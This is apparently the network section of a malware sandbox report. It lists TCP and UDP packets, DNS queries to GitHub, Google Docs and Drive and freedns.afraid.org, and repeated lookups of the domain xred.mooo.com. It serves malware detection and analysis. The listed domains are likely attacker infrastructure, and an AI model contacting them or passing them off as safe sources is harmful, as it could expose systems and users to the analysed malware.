                                                                                                                                                                Dec 25, 2024 09:08:56.580789089 CET44350115142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.580815077 CET50115443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:56.580885887 CET44350115142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.580918074 CET50115443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:56.580944061 CET50115443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:56.581398010 CET44350115142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.581432104 CET44350115142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.581470966 CET50115443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:56.581650972 CET50115443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:56.581696987 CET44350115142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.581981897 CET50127443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:56.582005024 CET44350127142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.582061052 CET50127443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:56.582266092 CET50127443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:56.582278013 CET44350127142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.822916985 CET44350117142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.822958946 CET44350117142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.823010921 CET50117443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:56.823026896 CET44350117142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.823067904 CET50117443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:56.823991060 CET50117443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:56.824023008 CET44350117142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.824125051 CET44350117142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.824161053 CET50117443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:56.824194908 CET50117443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:56.824955940 CET50128443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:56.825002909 CET44350128142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.825061083 CET50128443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:56.825319052 CET50128443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:56.825333118 CET44350128142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:57.054943085 CET50125443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:57.054981947 CET50126443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:57.054995060 CET50127443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:57.055015087 CET50128443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:57.055504084 CET50129443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:57.055525064 CET44350129142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:57.055608988 CET50129443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:57.056803942 CET50129443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:57.056814909 CET44350129142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:57.057337046 CET50130443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:57.057420015 CET44350130142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:57.057547092 CET50130443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:57.058423996 CET50130443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:57.058458090 CET44350130142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:58.744837046 CET44350130142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:58.744935036 CET50130443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:58.745476007 CET44350130142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:58.745537043 CET50130443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:58.745812893 CET44350129142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:58.745887041 CET50129443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:58.746448994 CET44350129142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:58.746516943 CET50129443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:58.748562098 CET50130443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:58.748606920 CET44350130142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:58.748822927 CET44350130142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:58.749041080 CET50130443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:58.749389887 CET50130443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:58.749857903 CET50129443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:58.749869108 CET44350129142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:58.750065088 CET44350129142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:58.750233889 CET50129443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:58.750551939 CET50129443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:58.791364908 CET44350129142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:58.795342922 CET44350130142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.644221067 CET44350130142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.644289017 CET50130443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:59.644321918 CET44350130142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.644376040 CET50130443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:59.645020962 CET44350130142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.645055056 CET44350130142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.645067930 CET50130443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:59.645102024 CET50130443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:59.646545887 CET44350129142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.646636009 CET50129443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:59.646646023 CET44350129142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.646687984 CET50129443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:59.647380114 CET44350129142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.647409916 CET44350129142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.647438049 CET50129443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:59.647449017 CET50129443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:59.649830103 CET50130443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:59.649856091 CET44350130142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.649981976 CET50129443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:59.649991989 CET44350129142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.650475025 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:59.650475025 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:59.650501013 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.650504112 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.650573969 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:59.650645018 CET50145443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:59.650646925 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:59.650660038 CET44350145142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.650713921 CET50145443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:59.650772095 CET50146443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:59.650794983 CET44350146142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.650882959 CET50146443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:59.650969982 CET50145443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:59.650979042 CET44350145142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.651154995 CET50146443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:59.651182890 CET44350146142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.651525974 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:59.651539087 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:59.651654005 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:59.651669979 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.341922998 CET44350145142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.342061043 CET50145443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:01.342561960 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.342643976 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:01.343364000 CET44350146142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.343511105 CET50146443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:01.343772888 CET50145443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:01.343776941 CET44350145142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.347610950 CET50145443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:01.347615004 CET44350145142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.351547956 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.351634026 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:01.360058069 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:01.360085011 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.360521078 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.360584974 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:01.363506079 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:01.363522053 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.363732100 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.363787889 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:01.364943981 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:01.365314007 CET50146443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:01.365326881 CET44350146142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.365667105 CET50146443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:01.365673065 CET44350146142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.366528034 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:01.411328077 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:01.411335945 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.245775938 CET44350146142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.246028900 CET50146443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.246068954 CET44350146142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.246253967 CET50146443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.246460915 CET50146443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.246525049 CET44350146142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.246599913 CET50146443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.247822046 CET50154443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.247869015 CET44350154142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.247931957 CET50154443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.248136997 CET50154443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.248150110 CET44350154142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.259016991 CET44350145142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.259077072 CET50145443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.259088993 CET44350145142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.259129047 CET50145443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.259195089 CET50145443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.259223938 CET44350145142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.259330034 CET50145443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.259715080 CET50155443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.259789944 CET44350155142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.259875059 CET50155443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.260087013 CET50155443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:02.260122061 CET44350155142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.275005102 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.275046110 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.275068998 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.275082111 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.275120974 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.275132895 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.275173903 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.275820017 CET50143443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.275830984 CET44350143142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.276576996 CET50156443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.276592970 CET44350156142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.276702881 CET50156443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.277041912 CET50156443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.277053118 CET44350156142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.521420956 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.521492004 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.521522045 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.521650076 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.521656990 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.521702051 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.521709919 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.521821022 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.521825075 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.521862984 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.521867037 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.521914005 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.522187948 CET50144443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.522202969 CET44350144142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.522789955 CET50158443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.522800922 CET44350158142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.522919893 CET50158443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.523144960 CET50158443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:02.523156881 CET44350158142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:03.657898903 CET50154443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:03.657923937 CET50155443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:03.658011913 CET50156443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:03.658024073 CET50158443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:09:03.659332991 CET50160443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:03.659394026 CET44350160142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:03.659612894 CET50160443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:03.660250902 CET50160443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:03.660295963 CET44350160142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:03.661684036 CET50161443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:03.661714077 CET44350161142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:03.661907911 CET50161443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:03.662853003 CET50161443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:03.662866116 CET44350161142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:05.348068953 CET44350160142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:05.348162889 CET50160443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:05.348711967 CET44350160142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:05.349256992 CET50160443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:05.349931955 CET44350161142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:05.350004911 CET50161443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:09:05.350574017 CET44350161142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:05.350635052 CET50161443192.168.2.4142.250.181.14

                                                                                                                                                                UDP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Dec 25, 2024 09:06:59.825227976 CET6220053192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:06:59.962264061 CET53622001.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:23.054270983 CET6394153192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:07:23.190854073 CET53639411.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:23.865843058 CET5439253192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:07:24.226063013 CET53543921.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:24.231812000 CET6067153192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:07:24.544472933 CET53606711.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:26.102535009 CET6497053192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:07:26.239525080 CET53649701.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:29.315047979 CET5490953192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:07:29.453108072 CET53549091.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:35.144891977 CET6387353192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:07:35.281929970 CET53638731.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:39.935925007 CET5985253192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:07:40.073894024 CET53598521.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:45.880687952 CET5108153192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:07:46.018011093 CET53510811.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.904930115 CET5838353192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:07:53.042840958 CET53583831.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:59.993002892 CET6491153192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:08:00.130219936 CET53649111.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:06.943260908 CET5012253192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:08:07.080657005 CET53501221.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.915927887 CET5265753192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:08:14.052505970 CET53526571.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:20.892265081 CET5063053192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:08:21.029758930 CET53506301.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:27.816040993 CET4934653192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:08:27.953552008 CET53493461.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:34.768434048 CET5181853192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:08:34.906083107 CET53518181.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:39.518984079 CET5766853192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:08:39.656625032 CET53576681.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:45.331218004 CET5557853192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:08:45.468411922 CET53555781.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.029160976 CET5573553192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:08:50.165954113 CET53557351.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:55.896200895 CET6188253192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:08:56.034449100 CET53618821.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:02.850810051 CET5162053192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:09:02.989532948 CET53516201.1.1.1192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:09:22.547324896 CET6346453192.168.2.41.1.1.1
                                                                                                                                                                Dec 25, 2024 09:09:22.684506893 CET53634641.1.1.1192.168.2.4

                                                                                                                                                                DNS Queries

                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                Dec 25, 2024 09:06:59.825227976 CET192.168.2.41.1.1.10xd986Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:23.054270983 CET192.168.2.41.1.1.10x3356Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:23.865843058 CET192.168.2.41.1.1.10x8f89Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:24.231812000 CET192.168.2.41.1.1.10x3222Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:26.102535009 CET192.168.2.41.1.1.10x6f36Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:29.315047979 CET192.168.2.41.1.1.10xf930Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:35.144891977 CET192.168.2.41.1.1.10x8903Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:39.935925007 CET192.168.2.41.1.1.10x30b2Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:45.880687952 CET192.168.2.41.1.1.10x188bStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:52.904930115 CET192.168.2.41.1.1.10x1793Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:07:59.993002892 CET192.168.2.41.1.1.10xe842Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:06.943260908 CET192.168.2.41.1.1.10x23f5Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:13.915927887 CET192.168.2.41.1.1.10xb374Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:20.892265081 CET192.168.2.41.1.1.10x894dStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:27.816040993 CET192.168.2.41.1.1.10x8391Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:34.768434048 CET192.168.2.41.1.1.10xd74eStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:39.518984079 CET192.168.2.41.1.1.10xbdccStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:45.331218004 CET192.168.2.41.1.1.10xa1d6Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:50.029160976 CET192.168.2.41.1.1.10x767cStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:08:55.896200895 CET192.168.2.41.1.1.10xae77Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:09:02.850810051 CET192.168.2.41.1.1.10x7153Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:09:22.547324896 CET192.168.2.41.1.1.10x95e7Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                                                                                                DNS Answers

                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                Dec 25, 2024 09:06:59.962264061 CET1.1.1.1192.168.2.40xd986No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:06:59.962264061 CET1.1.1.1192.168.2.40xd986No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:06:59.962264061 CET1.1.1.1192.168.2.40xd986No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                Dec 25, 2024 09:06:59.962264061 CET1.1.1.1192.168.2.40xd986No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
